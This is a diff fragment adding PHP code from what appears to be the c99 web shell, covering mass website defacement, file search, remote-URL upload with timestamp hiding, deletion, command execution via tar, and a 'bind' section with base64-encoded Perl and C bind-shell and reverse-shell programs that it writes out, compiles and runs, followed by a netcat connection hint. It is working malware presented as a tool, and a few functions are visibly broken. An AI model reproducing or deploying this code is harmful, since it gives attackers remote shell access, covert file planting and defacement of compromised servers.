+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+   c99fsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  if (empty($v)) {}
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ }
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  if (empty($v)) {}
+  $result = fopen();
+  if (!$result) {$deferr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+   $cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\","/",$v);
+   if (is_dir($v))
+   {
+    if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Can't call archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while ($o = readdir($h)) {$list[] = $d.$o;}
+   closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   
+   $k = $sort[0];
+   if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+   if ($sort[1] == "a")
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+   }
+   else
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>";
+   }
+   
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i."a\">".$row[$i]."</a>";}
+   }
+   
+   $tab = array();
+   $tab[cols] = array($row);
+   $tab[head] = array();
+   $tab[dirs] = array();
+   $tab[links] = array();
+   $tab[files] = array();
+
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $dir = dirname($v);
+     
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+  
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+
+    $row = array();
+
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+     else {$type = "DIR";}
+     $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size(filesize($v));
+    }
+    $row[] = date("d.m.Y H:i:s",filemtime($v));
+     
+    if (!$win)
+    {
+     $ow = @posix_getpwuid(fileowner($v));
+     $gr = @posix_getgrgid(filegroup($v));
+     $row[] = $ow["name"]."/".$gr["name"];
+    }
+         
+    if (is_writable($v)) {$row[] = "<font color=\"green\">".view_perms(fileperms($v))."</font>";}
+    else {$row[] = "<font color=\"red\">".view_perms(fileperms($v))."</font>";}
+
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+
+    if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+    elseif (is_link($v)) {$tab[links][] = $row;}
+    elseif (is_dir($v)) {$tab[dirs][] = $row;}
+    elseif (is_file($v)) {$tab[files][] = $row;}
+   }   
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+   global $v;
+   return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+   $tab[dirs] = array_reverse($tab[dirs]);
+   $tab[files] = array_reverse($tab[files]);
+  }
+  //Compiling table
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<b>Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>";
+  echo "<option value=\"archive\"".gchds($dspact,"archive"," selected").">Archive</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>";
+   echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>";
+   echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "bind")
+{
+ $bndsrcs = array(
+"c99sh_bindport.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
+"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
+"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
+"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
+"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
+"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
+"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
+"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
+"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
+"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
+
+"c99sh_bindport.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
+"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
+"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
+"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
+"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
+"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
+"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
+"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
+"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
+"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
+"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
+"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
+"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
+"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
+"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
+"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
+"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
+"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
+"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
+"fQ==",
+
+"c99sh_backconn.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
+"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
+"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
+"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
+"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
+"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
+"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
+"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
+"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
+"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
+
+"c99sh_backconn.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
+"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
+"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
+"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
+"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
+"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
+"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
+"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
+"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
+"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
+"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
+"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
+);
+
+ $bndportsrcs = array(
+"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+"c99sh_bindport.c"=>array("Using C","%path %port %pass")
+);
+
+ $bcsrcs = array(
+"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+"c99sh_backconn.c"=>array("Using C","%path %host %port")
+);
+
+ if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";}
+ else
+ {
+  if (!is_array($bind)) {$bind = array();}
+  if (!is_array($bc)) {$bc = array();}
+  if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;}
+  if (empty($bind[pass])) {$bind[pass] = $bindport_pass;}
+  if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;}
+  if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;}
+  if (!empty($bindsubmit))
+  {
+   echo "<b>Result of binding port:</b><br>";
+   $v = $bndportsrcs[$bind[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bind[src];
+    $w = explode(".",$bind[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%port",$bind[port],$v[1]);
+     $v[1] = str_replace("%pass",$bind[pass],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     sleep(5); //Timeout
+     $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5);
+     if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";}
+     else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind[port]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind[port]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+    }
+    echo "<br>";
+   }
+  }
+  if (!empty($bcsubmit))
+  {
+   echo "<b>Result of back connection:</b><br>";
+   $v = $bcsrcs[$bc[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bc[src];
+    $w = explode(".",$bc[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%host",$bc[host],$v[1]);
+     $v[1] = str_replace("%port",$bc[port],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     echo "Now script try connect to ".$bc[host].":".$bc[port]."...<br>";
+    }
+   }
+  }
+  ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[port]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind[pass]); ?>">&nbsp;<select name="bind[src]"><?php
